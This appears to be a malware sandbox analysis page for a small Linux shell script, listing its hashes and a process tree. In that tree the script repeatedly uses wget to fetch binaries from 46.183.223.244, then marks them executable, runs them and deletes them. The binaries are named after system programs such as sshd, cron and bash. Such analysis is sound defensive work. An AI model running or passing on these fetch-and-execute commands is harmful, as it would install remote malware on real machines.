bd942742aa07360c6237a49ef4b852604825c5d537498f4ffc3ca3f07c72cd70

Analysis

max time kernel
45s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20231215-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
22/12/2023, 11:19

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

8810413c21d81b940d975be430fc184f
Size

1KB
MD5

8810413c21d81b940d975be430fc184f
SHA1

3052f28e3bf36b4135d31ef2aca42c6b110f0a21
SHA256

bd942742aa07360c6237a49ef4b852604825c5d537498f4ffc3ca3f07c72cd70
SHA512

fe8851f85a5e25403b9392393dc9aa89ff5f9ffa6cca2f08e4c671facd7a9de04e3fbeaaeac9b1c67687b520e05211a78315c9aa9ae089c647c7c29a338274b5

Score

1^/10

Malware Config

Signatures

/tmp/8810413c21d81b940d975be430fc184f
/tmp/8810413c21d81b940d975be430fc184f
1⤵
PID:1537
- /usr/bin/wget
  wget http://46.183.223.244/ntpd
  2⤵
  PID:1538
- /bin/chmod
  chmod +x ntpd
  2⤵
  PID:1542
- /tmp/ntpd
  ./ntpd
  2⤵
  PID:1543
- /bin/rm
  rm -rf ntpd
  2⤵
  PID:1544
- /usr/bin/wget
  wget http://46.183.223.244/sshd
  2⤵
  PID:1545
- /bin/chmod
  chmod +x sshd
  2⤵
  PID:1546
- /tmp/sshd
  ./sshd
  2⤵
  PID:1547
- /bin/rm
  rm -rf sshd
  2⤵
  PID:1548
- /usr/bin/wget
  wget http://46.183.223.244/openssh
  2⤵
  PID:1549
- /bin/chmod
  chmod +x openssh
  2⤵
  PID:1550
- /tmp/openssh
  ./openssh
  2⤵
  PID:1551
- /bin/rm
  rm -rf openssh
  2⤵
  PID:1552
- /usr/bin/wget
  wget http://46.183.223.244/bash
  2⤵
  PID:1553
- /bin/chmod
  chmod +x bash
  2⤵
  PID:1554
- /tmp/bash
  ./bash
  2⤵
  PID:1555
- /bin/rm
  rm -rf bash
  2⤵
  PID:1556
- /usr/bin/wget
  wget http://46.183.223.244/tftp
  2⤵
  PID:1557
- /bin/chmod
  chmod +x tftp
  2⤵
  PID:1558
- /tmp/tftp
  ./tftp
  2⤵
  PID:1559
- /bin/rm
  rm -rf tftp
  2⤵
  PID:1560
- /usr/bin/wget
  wget http://46.183.223.244/wget
  2⤵
  PID:1561
- /bin/chmod
  chmod +x wget
  2⤵
  PID:1562
- /tmp/wget
  ./wget
  2⤵
  PID:1563
- /bin/rm
  rm -rf wget
  2⤵
  PID:1564
- /usr/bin/wget
  wget http://46.183.223.244/cron
  2⤵
  PID:1565
- /bin/chmod
  chmod +x cron
  2⤵
  PID:1566
- /tmp/cron
  ./cron
  2⤵
  PID:1567
- /bin/rm
  rm -rf cron
  2⤵
  PID:1568
- /usr/bin/wget
  wget http://46.183.223.244/ftp
  2⤵
  PID:1569
- /bin/chmod
  chmod +x ftp
  2⤵
  PID:1572
- /tmp/ftp
  ./ftp
  2⤵
  PID:1573
- /bin/rm
  rm -rf ftp
  2⤵
  PID:1574
- /usr/bin/wget
  wget http://46.183.223.244/pftp
  2⤵
  PID:1575
- /bin/chmod
  chmod +x pftp
  2⤵
  PID:1576
- /tmp/pftp
  ./pftp
  2⤵
  PID:1577
- /bin/rm
  rm -rf pftp
  2⤵
  PID:1578
- /usr/bin/wget
  wget http://46.183.223.244/sh
  2⤵
  PID:1579
- /bin/chmod
  chmod +x sh
  2⤵
  PID:1580
- /tmp/sh
  ./sh
  2⤵
  PID:1581
- /bin/rm
  rm -rf sh
  2⤵
  PID:1582
- /usr/bin/wget
  wget "http://46.183.223.244/[cpu]"
  2⤵
  PID:1583
- /bin/chmod
  chmod +x "[cpu]"
  2⤵
  PID:1584
- /tmp/[cpu]
  "./[cpu]"
  2⤵
  PID:1585
- /bin/rm
  rm -rf "[cpu]"
  2⤵
  PID:1586
- /usr/bin/wget
  wget http://46.183.223.244/apache2
  2⤵
  PID:1587
- /bin/chmod
  chmod +x apache2
  2⤵
  PID:1588
- /tmp/apache2
  ./apache2
  2⤵
  PID:1589
- /bin/rm
  rm -rf apache2
  2⤵
  PID:1590
- /usr/bin/wget
  wget http://46.183.223.244/telnetd
  2⤵
  PID:1591
- /bin/chmod
  chmod +x telnetd
  2⤵
  PID:1592
- /tmp/telnetd
  ./telnetd
  2⤵
  PID:1593
- /bin/rm
  rm -rf telnetd
  2⤵
  PID:1594

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads